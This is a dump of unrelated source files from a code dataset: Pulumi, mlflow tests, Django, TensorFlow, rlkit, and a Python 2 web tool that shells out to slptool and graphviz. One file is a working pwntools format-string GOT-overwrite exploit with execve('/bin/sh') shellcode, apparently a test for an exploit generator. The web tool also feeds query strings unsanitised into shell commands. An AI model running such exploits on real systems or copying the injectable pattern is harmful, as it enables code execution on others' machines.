alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180201:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180401:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180601:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180701:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20180801:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20181001:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20181101:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20181201:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190201:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190401:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190601:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190701:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190801:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20190901:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20191101:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20191201:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20200301:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20200501:DdosProtectionPlan"), pulumi.Alias(type_="azure-nextgen:network/v20200601:DdosProtectionPlan")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DdosProtectionPlan, __self__).__init__(
'azure-nextgen:network/v20200401:DdosProtectionPlan',
resource_name,
__props__,
opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'DdosProtectionPlan':
        """
        Get an existing DdosProtectionPlan resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # No input properties are supplied here: all state is read back from
        # the provider using the resource id attached to `opts` above.
        __props__ = dict()
        return DdosProtectionPlan(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def etag(self) -> pulumi.Output[str]:
        """
        A unique read-only string that changes whenever the resource is updated.
        """
        # Output-only property populated by the provider after create/read.
        return pulumi.get(self, "etag")
    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[Optional[str]]:
        """
        Resource location.
        """
        # Optional input mirrored back as an output; may be unset (None).
        return pulumi.get(self, "location")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Resource name.
        """
        # Output-only: initialized to None at creation and filled by Azure.
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> pulumi.Output[str]:
        """
        The provisioning state of the DDoS protection plan resource.
        """
        # Output-only: reported by Azure (provider key "provisioningState").
        return pulumi.get(self, "provisioning_state")
    @property
    @pulumi.getter(name="resourceGuid")
    def resource_guid(self) -> pulumi.Output[str]:
        """
        The resource GUID property of the DDoS protection plan resource. It uniquely identifies the resource, even if the user changes its name or migrate the resource across subscriptions or resource groups.
        """
        # Output-only stable identifier (provider key "resourceGuid").
        return pulumi.get(self, "resource_guid")
    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        Resource tags.
        """
        # Optional input mirrored back as an output mapping.
        return pulumi.get(self, "tags")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        Resource type.
        """
        # Output-only: the Azure resource type string.
        return pulumi.get(self, "type")
    @property
    @pulumi.getter(name="virtualNetworks")
    def virtual_networks(self) -> pulumi.Output[Sequence['outputs.SubResourceResponse']]:
        """
        The list of virtual networks associated with the DDoS protection plan resource. This list is read-only.
        """
        # Output-only association list (provider key "virtualNetworks").
        return pulumi.get(self, "virtual_networks")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
a650ff2e726fa3c8a71871ebc3fe44fa460c67d6 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /08_FmtString-unit-tests/10_32/verified-exploit-FsGotShellcode.py | 267c686b65001ace4568decd888bfabf4113bbdb | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,583 | py | # +------------------------------------------------+
# | Atack: Format String GOT Shellcode |
# +------------------------------------------------+
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/10-fmt_strings
from pwn import *
import sf
target = process("./chall-test_FmtString-10-x86")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (92)
fs = sf.WriteFmtStr(
arch = 32,
value = -0x36,
address = 0x804b2d8,
offset = 0x4,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = ret_address,
address_base = 0)
payload = sf.BufferOverflow(arch=32, start=92)
payload.add_bytes(92, fs.generate_fmt_str())
payload.add_bytes(54, b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80")
target.sendline(payload.generate_payload())
target.interactive()
# +------------------------------------------------+
# | Artist: Avenged Sevenfold |
# +------------------------------------------------+
# | Song: Bat Country |
# +------------------------------------------------+
# | Scared but you can follow me |
# | I'm |
# | Too weird to live but much to rare |
# | to die |
# +------------------------------------------------+
| [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
93366da9c13ccb209b3b624ab0008ae69ab264fb | 80810054516ddc3fd93e916de4bf7e3e07d871b0 | /1-books/book2_TensorFlow实战Google深度学习框架(第二版)/practice/LSTM_test1.py | cbed959b70b74bac7a7f453e2de3150c42bb2b24 | [] | no_license | TinyHandsome/BookStudy | df9ca668f2dd1b51b1e364c22bc531394a03eeae | 69c9018bb70893f74a44e4df9f3d3e39467de3f6 | refs/heads/master | 2023-09-04T03:06:43.918259 | 2023-09-01T04:27:01 | 2023-09-01T04:27:01 | 184,217,837 | 18 | 17 | null | null | null | null | UTF-8 | Python | false | false | 2,216 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# coding=utf-8
"""
@author: Li Tian
@contact: 694317828@qq.com
@software: pycharm
@file: LSTM_test1.py
@time: 2018/12/23 13:37
@desc: LSTM test 1 -- illustrative code transcribed from the book; names such
       as lstm_hidden_size, batch_size, num_steps, current_input,
       fully_connected, calc_loss and expected_output are assumed to be
       defined elsewhere, so this file is not runnable on its own.
"""
import tensorflow as tf
# Define an LSTM structure. In TensorFlow a complete LSTM can be created with a
# single call; the variables used inside the LSTM are declared automatically
# by this function.
lstm = tf.nn.rnn_cell.BasicLSTMCell(lstm_hidden_size)
# Initialize the LSTM state to all zeros. BasicLSTMCell provides zero_state to
# build the all-zero initial state. `state` is an LSTMStateTuple of two
# tensors, where state.c and state.h correspond to the cell state c and the
# hidden state h. As with other networks, a batch of training samples is used
# per optimization step; batch_size gives the size of one batch.
state = lstm.zero_state(batch_size, tf.float32)
# Define the loss accumulator.
loss = 0.0
# Although at test time an RNN can handle sequences of arbitrary length, for
# training the recurrent network is unrolled into a feed-forward network, so
# the training sequence length must be known. num_steps is that length;
# chapter 9 covers handling variable-length sequences with dynamic_rnn.
for i in range(num_steps):
    # Declare the variables used by the LSTM at the first time step, and reuse
    # those same variables at every later step.
    if i > 0:
        tf.get_variable_scope().reuse_variables()
    # Process one time step of the sequence: feed the current input
    # current_input (xt) and the previous state `state` (ht-1 and ct-1) into
    # the LSTM, obtaining the current output lstm_output (ht) and the updated
    # state (ht and ct). lstm_output feeds the layers above, while `state`
    # feeds the next time step; they can be treated differently (e.g. dropout).
    lstm_output, state = lstm(current_input, state)
    # Pass the LSTM output through a fully connected layer for the final output.
    final_output = fully_connected(lstm_output)
    # Accumulate the loss of the output at this time step.
    loss += calc_loss(final_output, expected_output)
# Train the model with the methods introduced in chapter 4.
| [
"694317828@qq.com"
] | 694317828@qq.com |
25a74194ca6e00f498d76dc01fac448dabd6dcdc | 5d28c38dfdd185875ba0edaf77281e684c81da0c | /tests/projects/backend/test_local.py | 6d2c431abc4dfb26ae7324c1182734a9f5c5ff01 | [
"Apache-2.0"
] | permissive | imrehg/mlflow | 3a68acc1730b3ee6326c1366760d6ddc7e66099c | 5ddfe9a1b48e065540094d83125040d3273c48fa | refs/heads/master | 2022-09-24T05:39:02.767657 | 2022-09-20T00:14:07 | 2022-09-20T00:14:07 | 244,945,486 | 1 | 0 | Apache-2.0 | 2020-03-04T16:11:54 | 2020-03-04T16:11:53 | null | UTF-8 | Python | false | false | 3,187 | py | import os
from unittest import mock
from mlflow.projects.backend.local import _get_docker_artifact_storage_cmd_and_envs
def test_docker_s3_artifact_cmd_and_envs_from_env():
    """With AWS creds in the environment and no ~/.aws dir, credentials are
    forwarded via environment variables only (no volume mounts)."""
    env = {
        "AWS_SECRET_ACCESS_KEY": "mock_secret",
        "AWS_ACCESS_KEY_ID": "mock_access_key",
        "MLFLOW_S3_ENDPOINT_URL": "mock_endpoint",
        "MLFLOW_S3_IGNORE_TLS": "false",
    }
    patched_environ = mock.patch.dict("os.environ", env)
    no_aws_dir = mock.patch("posixpath.exists", return_value=False)
    with patched_environ, no_aws_dir:
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs("s3://mock_bucket")
    assert cmds == []
    assert envs == env
def test_docker_s3_artifact_cmd_and_envs_from_home():
    """With no AWS env vars but an existing ~/.aws dir, the dir is mounted
    into the container at /.aws."""
    env = {}
    patched_environ = mock.patch.dict("os.environ", env)
    aws_dir_exists = mock.patch("posixpath.exists", return_value=True)
    home_dir = mock.patch("posixpath.expanduser", return_value="mock_volume")
    with patched_environ, aws_dir_exists, home_dir:
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs("s3://mock_bucket")
    assert cmds == ["-v", "mock_volume:/.aws"]
    assert envs == env
def test_docker_wasbs_artifact_cmd_and_envs_from_home():
    # Azure blob storage: credentials travel via env vars only, no mounts.
    # The import is only to skip the test when azure-storage is unavailable.
    # pylint: disable=unused-import
    from azure.storage.blob import BlobServiceClient
    mock_env = {
        "AZURE_STORAGE_CONNECTION_STRING": "mock_connection_string",
        "AZURE_STORAGE_ACCESS_KEY": "mock_access_key",
    }
    wasbs_uri = "wasbs://container@account.blob.core.windows.net/some/path"
    # Patch the client class so no real Azure connection is attempted.
    with mock.patch.dict("os.environ", mock_env), mock.patch(
        "azure.storage.blob.BlobServiceClient"
    ):
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs(wasbs_uri)
        assert cmds == []
        assert envs == mock_env
def test_docker_gcs_artifact_cmd_and_envs_from_home():
    """The GCS credentials file is mounted into the container at /.gcs and the
    env var is repointed at the mounted path."""
    env = {"GOOGLE_APPLICATION_CREDENTIALS": "mock_credentials_path"}
    with mock.patch.dict("os.environ", env, clear=True):
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs("gs://mock_bucket")
    assert cmds == ["-v", "mock_credentials_path:/.gcs"]
    assert envs == {"GOOGLE_APPLICATION_CREDENTIALS": "/.gcs"}
def test_docker_hdfs_artifact_cmd_and_envs_from_home():
    # HDFS: the kerberos ticket cache is bind-mounted at the same path inside
    # the container and all MLFLOW_* env vars are forwarded unchanged.
    mock_env = {
        "MLFLOW_KERBEROS_TICKET_CACHE": "/mock_ticket_cache",
        "MLFLOW_KERBEROS_USER": "mock_krb_user",
        "MLFLOW_PYARROW_EXTRA_CONF": "mock_pyarrow_extra_conf",
    }
    hdfs_uri = "hdfs://host:8020/path"
    with mock.patch.dict("os.environ", mock_env, clear=True):
        cmds, envs = _get_docker_artifact_storage_cmd_and_envs(hdfs_uri)
        assert cmds == ["-v", "/mock_ticket_cache:/mock_ticket_cache"]
        assert envs == mock_env
def test_docker_local_artifact_cmd_and_envs():
    """Local file URIs are bind-mounted into the container's project dir."""
    expected_host_path = os.path.abspath("./mlruns")
    expected_container_path = "/mlflow/projects/code/mlruns"
    cmds, envs = _get_docker_artifact_storage_cmd_and_envs("file:./mlruns")
    assert cmds == ["-v", f"{expected_host_path}:{expected_container_path}"]
    assert envs == {}
def test_docker_unknown_uri_artifact_cmd_and_envs():
    """Unrecognized artifact URI schemes yield no mounts and no extra env."""
    cmd, extra_env = _get_docker_artifact_storage_cmd_and_envs(
        "file-plugin://some_path"
    )
    assert cmd == []
    assert extra_env == {}
| [
"noreply@github.com"
] | imrehg.noreply@github.com |
ac0ef84ade51397fbee7edd074f3c6ea7195b611 | d700b9ad1e0b7225871b65ce0dafb27fb408c4bc | /students/k3342/laboratory_works/Frolov_Alex/laboratory_work_2/lab2_app/apps.py | 485b93435cb1e8f7116e847859352c160710f558 | [
"MIT"
] | permissive | TonikX/ITMO_ICT_WebProgramming_2020 | a8c573ed467fdf99327777fb3f3bfeee5714667b | ba566c1b3ab04585665c69860b713741906935a0 | refs/heads/master | 2023-01-11T22:10:17.003838 | 2020-10-22T11:22:03 | 2020-10-22T11:22:03 | 248,549,610 | 10 | 71 | MIT | 2023-01-28T14:04:21 | 2020-03-19T16:18:55 | Python | UTF-8 | Python | false | false | 95 | py | from django.apps import AppConfig
class Lab2AppConfig(AppConfig):
    """Django application configuration registering the ``lab2_app`` app."""
    name = 'lab2_app'
| [
"noreply@github.com"
] | TonikX.noreply@github.com |
f3a373a6f19c2f0cffafcbdfe7cc7e243c9f42e0 | cac9c211a4eeb55cfd61d8e5c54a1d4082c4de33 | /Experimental/SLP/webslptool.py | 05fc80ef9e7f2def20ce53e4aa4dcd72059c9b6e | [
"BSD-3-Clause"
] | permissive | vchateauneu/survol | 8c8b5db67f81c6400c3e2f4b84b57fb83d69fb1f | 2b5be9d28115f8f9b1dd91bf05449c92bf9a9926 | refs/heads/master | 2020-03-21T09:11:37.765314 | 2018-07-03T20:40:16 | 2018-07-03T20:40:16 | 138,387,051 | 1 | 0 | null | 2018-06-23T09:05:45 | 2018-06-23T09:05:45 | null | UTF-8 | Python | false | false | 8,376 | py | #!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import CGIHTTPServer
import re
import os
from os import curdir, sep
import cgi
import time
import urllib
import quik
from quik import FileLoader
def PrintTime():
    """Print the current wall-clock time (HH:MM:SS) for coarse profiling."""
    print(time.strftime('%X'))
PORT_NUMBER = 1234
# Specialised htpp server which parses its input html file and replaces
# templates by SLP values.
class SlpService:
    """Value object describing one service discovered via SLP."""
    def __init__(self, name, url, rest, label):
        # Trace each discovered service as it is recorded.
        print("Name=" + name + " url=" + url)
        self.m_name = name
        self.m_url = url
        self.m_rest = rest
        self.m_label = label
# Only the services we want.
# Query slptool for advertised SLP services matching *filter* (e.g. "http.rdf")
# and parse every answer line into a SlpService; returns the list of services.
def GetSlpServices(filter):
    services_list = []
    stream = os.popen("slptool findsrvs service:" + filter)
    # Example answer line:
    # service:ftp.smallbox://192.168.100.1:21,65535
    lbl = 0
    for line in stream:
        print "Li=" + line
        # group(1): service name, group(2): host[:port], group(3): trailing
        # ",lifetime" remainder. The URL is rebuilt with an http scheme.
        matchObj = re.match( r'service:([^:]*):/?/?([^,]*)(.*)', line, re.M|re.I)
        if matchObj:
            service = SlpService(
                matchObj.group(1) ,
                'http' + '://' + matchObj.group(2) ,
                matchObj.group(3) ,
                'label_' + str(lbl) )
            services_list.append( service )
        else:
            print "No match!!"
        lbl = lbl + 1
    return services_list
def ProcessSlpTmpl(tmplfile):
    # Render the quik template *tmplfile* with the SLP services currently
    # advertised for the hard-coded "http.rdf" filter, write the generated
    # HTML next to it as "<tmplfile>.htm" and return that file name.
    service_filter='http.rdf'
    services_list = GetSlpServices(service_filter)
    # loader = FileLoader('html')
    loader = FileLoader('.')
    template = loader.load_template(tmplfile)
    generated_html = template.render(
        {
        'filter': service_filter,
        'services': services_list
        },
        loader=loader).encode('utf-8')
    outfile = tmplfile + ".htm"
    fil = open(outfile,'w')
    fil.write(generated_html)
    fil.close()
    return outfile
def ProcessPython(tmplfile):
    # NOTE(review): this function appears dead/broken: `split` is undefined at
    # module scope (str.split was presumably intended) and `generated_html` is
    # never assigned, so any call would raise NameError. Kept as-is; nothing
    # in this file calls it.
    selected_services = split("kjhglkjhl")
    outfile = tmplfile + ".htm"
    fil = open(outfile,'w')
    fil.write(generated_html)
    fil.close()
    return outfile
# Run the RDF merge script and collect its output into an RDF file.
def CallMerge(fullfile, cgivars, rdf_out_filnam):
    """Invoke the merge script *fullfile* (e.g. "svc_merge_rdf_files.py").

    fullfile       -- path of the merge script to execute
    cgivars        -- URL-encoded, ';'-separated list of RDF source URLs
    rdf_out_filnam -- file the merge script writes its merged RDF into

    Bug fix: the rdf_out_filnam parameter used to be unconditionally
    overwritten with "merge_result.rdf"; the caller-supplied name is now
    honored (the existing caller passes that same name, so behavior for it
    is unchanged).
    """
    cgivars_decoded = urllib.unquote(cgivars).decode('utf8')
    list_urls = cgivars_decoded.split(';')
    # Join the decoded URLs into one space-separated argument string.
    argurls = ' '.join(list_urls)
    command = fullfile + " " + argurls + " -v --output=" + rdf_out_filnam
    print("CallMerge=" + command)
    PrintTime()
    rdf_stream = os.popen(command)
    PrintTime()
    print("CallMerge output:")
    for rdf_line in rdf_stream:
        print(rdf_line)
    print("\n")
def ReplaceEdgesLabels(inFileName, outFileName):
    """Rewrite rdfdot-generated Graphviz output line by line.

    Edge lines such as
        node19 -> node12 [label="<http://.../memmap>"];
    and node lines such as
        node2 [label="<urn://DuoLnx/proc/12840>", shape=box, ...];
    are turned into URL="..."/label="last-path-component" attribute pairs so
    the rendered SVG carries clickable links with short labels.

    Robustness fix: the input and output files are now closed via ``with``
    even if an exception occurs mid-rewrite (previously they leaked).
    """
    print("ReplaceEdgesLabels " + inFileName + " " + outFileName)
    with open(inFileName) as inFil, open(outFileName, 'w') as outFil:
        for inLine in inFil:
            # Edges: split "<url/name>" into URL + short label, shrink font.
            tmpLine = re.sub(
                r'(.*) -> ([^ ]*) \[label="<([^"]*)/([^>]*)>"];',
                r'\1 -> \2 [URL="\3/\4", label="\4", fontsize="3" ];',
                inLine)
            # Nodes: same transformation for node label attributes.
            outLine = re.sub(
                r'(.*) \[label="<([^"]*)/([^>]*)>",',
                r'\1 [URL="\2/\3", label="\3",',
                tmpLine)
            outFil.write(outLine)
# Generate a svg file:
# rdfdot -png -svg result.rdf out.svg
# Pipeline: RDF -> (rdfdot) -> raw dot -> (ReplaceEdgesLabels) -> cleaned dot
# -> (graphviz dot, neato layout) -> SVG.
def CallToRdf(rdf_out_filnam,svg_out_filnam):
    # TODO: Must wait until the file is finished !!!!!!!!!!!!!!
    print "CallToRdf " + rdf_out_filnam + " " + svg_out_filnam
    # dot_command = "rdfdot -png -svg " + rdf_out_filnam + " " + svg_out_filnam
    dot_filnam_before = rdf_out_filnam + ".before.dot"
    # os.remove(dot_filnam_before)
    dot_filnam_before_err = rdf_out_filnam + ".before.dot.err"
    # os.remove(dot_filnam_before_err)
    # Step 1: convert RDF to dot, capturing stdout and stderr to files.
    dot_command = "rdfdot " + rdf_out_filnam + " > " + dot_filnam_before + " 2> " + dot_filnam_before_err
    print "ToDot=" + dot_command
    PrintTime()
    dot_stream = os.popen(dot_command)
    print "Dot command output:"
    for dot_line in dot_stream:
        print dot_line
    print "\n"
    PrintTime()
    dot_filnam_after = rdf_out_filnam + ".dot"
    # os.remove(dot_filnam_after)
    # Step 2: rewrite node/edge labels into URL + short-label attributes.
    ReplaceEdgesLabels( dot_filnam_before, dot_filnam_after )
    # dot -Kneato -Tsvg merge_result.rdf.dot -o merge_result.svg -Gfontpath=/usr/share/fonts/TTF -Gfontnames=svg -Nfontname=VeraBd.ttf -Efontname=VeraBd.ttf
    # dot -Kneato -Tsvg merge_result.rdf.dot -o merge_result.svg -Gfontpath=/usr/share/fonts/TTF -Gfontnames=svg -Nfontname=VeraBd.ttf -Efontname=VeraBd.ttf -v -Goverlap=false
    PrintTime()
    # Step 3: lay out the cleaned dot file with neato and emit SVG; explicit
    # fonts are forced so labels render consistently.
    svg_command = "dot -Kneato -Tsvg " + dot_filnam_after + " -o " + svg_out_filnam \
        + " -Gfontpath=/usr/share/fonts/TTF -Gfontnames=svg" \
        + " -Nfontname=VeraBd.ttf -Efontname=VeraBd.ttf" \
        + " -v -Goverlap=false "
    PrintTime()
    # http://www.graphviz.org/doc/info/attrs.html#d:fontname
    # Several possible options.
    # svg_command = "dot -Kfdp -o " + svg_out_filnam + " -Tsvg " + dot_filnam
    # svg_command = "dot -Kneato -o " + svg_out_filnam + " -Tsvg " + dot_filnam
    # command = "rdfdot -png -svg " + rdf_out_filnam + " " + svg_out_filnam
    print "ToSvg=" + svg_command
    # os.remove(svg_out_filnam)
    svg_stream = os.popen(svg_command)
    print "Svg command output:"
    for svg_line in svg_stream:
        print svg_line
    print "\n"
    PrintTime()
class myReqHandler(BaseHTTPRequestHandler):
    """HTTP handler serving SLP-template pages and two RDF CGI-style actions."""
    #Handler for the GET requests
    def do_GET(self):
        # Default page when the root is requested.
        if self.path=="/":
            self.path="/list_rdf_generators.htm"
        fullfile= curdir + sep + self.path
        cgivars = ""
        print "fullfile=" + fullfile
        # Split off the query string, if any, into cgivars.
        idx_quest = fullfile.find('?')
        print "idx_quest=" + str(idx_quest)
        if idx_quest != -1:
            cgivars = fullfile[idx_quest + 1:]
            fullfile = fullfile[0:idx_quest]
            print "fullfile=" + fullfile
            print "cgivars=" + cgivars
        # ".tmpl.htm" files are quik templates: render them first, then fall
        # through to the plain ".htm" branch to serve the generated file.
        if fullfile.endswith(".tmpl.htm"):
            print "Template replacement"
            fullfile = ProcessSlpTmpl( fullfile )
        if fullfile.endswith(".htm"):
            print "Get path=" + fullfile
            mimetype = 'html'
            infil = open(fullfile)
            self.send_response(200)
            self.send_header('Content-type',mimetype)
            self.end_headers()
            self.wfile.write(infil.read())
            infil.close()
            return
        # ".py" paths are dispatched by suffix to the two known actions.
        if fullfile.endswith(".py"):
            # TODO: FILE MUST BE A PARAMETER !!!!!!!!!!!!!!!!!!
            # For the moment it is OK.
            rdf_out_filnam = "merge_result.rdf"
            if fullfile.endswith("svc_merge_rdf_files.py"):
                # Merge the RDF URLs given in the query string, stream result.
                CallMerge(fullfile, cgivars, rdf_out_filnam)
                mimetype = 'rdf+xml'
                infil = open(rdf_out_filnam)
            elif fullfile.endswith("svc_rdf_to_svg.py"):
                # Convert the previously merged RDF to SVG, stream the SVG.
                svg_out_filnam = "from_rdf.svg"
                CallToRdf(rdf_out_filnam,svg_out_filnam)
                # image/svg+xml ??
                print "Streaming " + svg_out_filnam
                mimetype = 'svg+xml'
                infil = open(svg_out_filnam)
            else:
                # NOTE(review): falls through with `infil`/`mimetype` unset,
                # so the response code below would raise NameError.
                print "Should not happen:" + fullfile
            self.send_response(200)
            self.send_header('Content-type',mimetype)
            self.end_headers()
            self.wfile.write(infil.read())
            infil.close()
            # HERE: send the RDF-to-SVG transformation to another frame.
            # After that, the result could be exposed through SLP,
            # especially if it is recomputed periodically.
            return
        print "Should process the CGI variables"
    #Handler for the POST requests
    def do_POST(self):
        # Echo back every form field of a POST request as plain text.
        print "Post path=" + self.path
        form = cgi.FieldStorage(
            fp=self.rfile,
            headers=self.headers,
            environ={'REQUEST_METHOD':'POST',
                     'CONTENT_TYPE':self.headers['Content-Type'],
                     })
        #for theKey in form:
        #    print "Key=%s " % ( theKey )
        #    print "Key=%s is: %s" % ( theKey, form[theKey].name )
        #    print "Key=%s is: %s" % ( theKey, form[theKey].value )
        self.send_response(200)
        self.end_headers()
        self.wfile.write("Result\r\n")
        for theKey in form:
            self.wfile.write( "Key=%s is: %s\r\n" % ( theKey, form[theKey].value ) )
        #self.wfile.write( "Key=%s is: %s\r\n" % ( theKey, str(form[theKey]) ) )
        #self.wfile.write( "Key=%s \r\n" % ( theKey ) )
        return
try:
    # Create a web server and define the handler to manage the incoming request
    httpServer = HTTPServer(('', PORT_NUMBER), myReqHandler)
    print 'Started httpserver on port ' , PORT_NUMBER
    # handler.cgi_directories = [""]
    # Wait forever for incoming http requests
    httpServer.serve_forever()
except KeyboardInterrupt:
    # Ctrl-C is the intended shutdown path: release the listening socket.
    print '^C received, shutting down the web server'
    httpServer.socket.close()
| [
"remi.chateauneu@gmail.com"
] | remi.chateauneu@gmail.com |
c8d783e36ee0e5587a7cc94fd30c3ed54e15537c | 388e90c9cfdb59b28654d711fe1943aeda7cf3fd | /third_party/rlkit_library/rlkit/torch/distributions.py | f6d52d7e57d6894d213cc26a55d0ef533314bd5d | [
"MIT",
"Apache-2.0"
] | permissive | google-research/DBAP-algorithm | bbb2827de7f00c9efa30e3cde109ff755b4d008a | 545a4e780f9d9d480c96b67e7a8ae590a983db6b | refs/heads/main | 2023-07-05T00:38:47.424870 | 2021-08-09T23:59:10 | 2021-08-09T23:59:10 | 394,473,322 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 14,670 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Add custom distributions in addition to th existing ones
"""
import torch
from torch.distributions import Categorical, OneHotCategorical, kl_divergence
from torch.distributions import Normal as TorchNormal
from torch.distributions import Beta as TorchBeta
from torch.distributions import Distribution as TorchDistribution
from torch.distributions import Bernoulli as TorchBernoulli
from torch.distributions import Independent as TorchIndependent
from torch.distributions.utils import _sum_rightmost
from rlkit.core.eval_util import create_stats_ordered_dict
import rlkit.torch.pytorch_util as ptu
import numpy as np
from collections import OrderedDict
class Distribution(TorchDistribution):
    """torch Distribution extended with small rlkit conveniences."""

    def sample_and_logprob(self):
        """Draw a (non-reparameterized) sample and its log-probability."""
        sample = self.sample()
        return sample, self.log_prob(sample)

    def rsample_and_logprob(self):
        """Draw a reparameterized sample and its log-probability."""
        sample = self.rsample()
        return sample, self.log_prob(sample)

    def mle_estimate(self):
        """Point estimate of the distribution; defaults to the mean."""
        return self.mean

    def get_diagnostics(self):
        """Logging statistics for this distribution; subclasses override."""
        return {}
class TorchDistributionWrapper(Distribution):
    """Adapt a plain ``torch.distributions.Distribution`` to the rlkit
    :class:`Distribution` interface by delegating every property and method
    to the wrapped instance."""
    def __init__(self, distribution: TorchDistribution):
        self.distribution = distribution

    # Read-only views onto the wrapped distribution.
    @property
    def batch_shape(self):
        return self.distribution.batch_shape

    @property
    def event_shape(self):
        return self.distribution.event_shape

    @property
    def arg_constraints(self):
        return self.distribution.arg_constraints

    @property
    def support(self):
        return self.distribution.support

    @property
    def mean(self):
        return self.distribution.mean

    @property
    def variance(self):
        return self.distribution.variance

    @property
    def stddev(self):
        return self.distribution.stddev

    # Sampling and density queries, all forwarded unchanged.
    def sample(self, sample_size=torch.Size()):
        return self.distribution.sample(sample_shape=sample_size)

    def rsample(self, sample_size=torch.Size()):
        return self.distribution.rsample(sample_shape=sample_size)

    def log_prob(self, value):
        return self.distribution.log_prob(value)

    def cdf(self, value):
        return self.distribution.cdf(value)

    def icdf(self, value):
        return self.distribution.icdf(value)

    def enumerate_support(self, expand=True):
        return self.distribution.enumerate_support(expand=expand)

    def entropy(self):
        return self.distribution.entropy()

    def perplexity(self):
        return self.distribution.perplexity()

    def __repr__(self):
        return 'Wrapped ' + self.distribution.__repr__()
class Delta(Distribution):
    """A deterministic distribution"""
    def __init__(self, value):
        # `value` may carry gradients; rsample() passes them through.
        self.value = value

    def sample(self):
        # Detached so non-reparameterized sampling never backpropagates.
        return self.value.detach()

    def rsample(self):
        return self.value

    @property
    def mean(self):
        return self.value

    @property
    def variance(self):
        # A point mass has zero spread.
        return 0

    @property
    def entropy(self):
        # NOTE(review): unlike torch distributions, `entropy` is a *property*
        # returning the int 0 here, so callers writing `dist.entropy()` would
        # fail. Kept as-is.
        return 0
class Bernoulli(Distribution, TorchBernoulli):
    """torch Bernoulli with rlkit diagnostics over its success probability."""
    def get_diagnostics(self):
        probability_stats = create_stats_ordered_dict(
            'probability',
            ptu.get_numpy(self.probs),
        )
        return OrderedDict(probability_stats)
class Independent(Distribution, TorchIndependent):
    """torch ``Independent`` that forwards rlkit diagnostics to its base
    distribution."""
    def get_diagnostics(self):
        return self.base_dist.get_diagnostics()
class Beta(Distribution, TorchBeta):
    """torch Beta with rlkit diagnostics over its parameters and entropy."""
    def get_diagnostics(self):
        # NOTE(review): 'alpha' is read from concentration0 and 'beta' from
        # concentration1, which is the reverse of torch's naming; preserved
        # as-is so logged metrics keep their historical meaning.
        diagnostics = OrderedDict()
        for label, tensor in (
                ('alpha', self.concentration0),
                ('beta', self.concentration1),
                ('entropy', self.entropy()),
        ):
